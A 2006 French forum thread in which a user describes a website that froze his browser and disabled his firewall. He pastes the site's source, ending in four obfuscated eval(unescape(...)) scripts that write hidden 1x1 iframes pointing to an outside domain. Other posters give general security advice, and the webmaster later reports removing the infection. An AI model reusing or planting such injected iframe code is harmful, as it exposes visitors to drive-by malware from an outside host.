Crainte de spyware sur une page web - <script>eval(unescape( blabla

arsunt · Décembre 1, 2006, 3:25

Bonjour,

Je surfais innocemment sur /!\ http://www.skyperec.com/[/url] /!\ (attention, je poste car j’ai eu un problème !), venant du site officiel de [url=http://www.clubic.com/telecharger-fiche11171-skype.html]skype.com partie extras pour trouver un programme pour enregistrer des conversations Skype.

Mais en allant sur ce site, je vois le disque gratté à fond, la mémoire virtuelle monté d’un coup à plus de 500 Mo pour firefox.exe (version 2.0) et tout se figer. Une fenêtre apparait me demandant si je voulais bien enregistrer un .wmf chez moi et tout se fige.
Je kill le process de Windows XP et je recommence.

Une alerte de sécurité Windows me prévient que mon pare feu windows SP2 est désactivé. Je me dis, c’est pas normal !

Alors je regarde le code du site et voilà ce qu’il y a en bas :

</TABLE>
</BODY>
</HTML>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%34%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script><script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%73%66%67%66%64%67%72%74%79%68%67%66%64%2e%6e%65%74%2f%61%64%76%2f%30%35%34%2f%6e%65%77%33%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

Qu’est-ce que c’est que ce double eval(unescape( ?
Ai-je été infecté par un truc ?

Je précise que je suis sous Wifi, ce qui n’est pas si facile à déconnecter en cas de soucis.

Gabian78 · Décembre 1, 2006, 6:01

Bonjour,
Quelle est ta config ?
As tu un autre parefeu que celui de win ?
As tu un anti-spy ?
A+

arsunt · Décembre 1, 2006, 6:34

Firefox 2.0 - Windows XP SP2
Pare-feu de Windows uniquement, je suis dans un réseau Wifi
512 de RAM, Centrino 1,73 Ghz

J’ai passé Windows Defender, Spybot Search et “outils de suppression des logiciels malveillants” de Microsoft : RAS.

Mais j’aimerais bien comprendre tout de même …

Gabian78 · Décembre 1, 2006, 11:37

Re,
Ne pas oublier de visiter le topic "conseils pour proteger son pc"qui est de tres bon conseils.
Perso, après 1.5 ans derriere une box en routeur, j’ai eut une volée d’attaques tout genre, et j’ai installé un antiSpy (AVG) et un parefeu mieux que celui de win (Kerio par ex) et bien sur l’antivirus (Kaspersky)
Mais bon, il n’y a pas de protection 100%, tout depend de ce que l’on fait…
bon courage, tiens nous au courant

arsunt · Décembre 4, 2006, 8:03

Merci de vos réponses !

Mais j’ai passé des antivirus, anti adware et vidé les caches tout le week end, rien n’a bougé sur mon ordinateur donc je suis rassuré.

Le webmaster du site m’a répondu :


I've already removed the virus, and I haven't any ideas how it's happened.

Il a enlevé le virus et ne comprend pas ce qui c’est passé.

merci à tous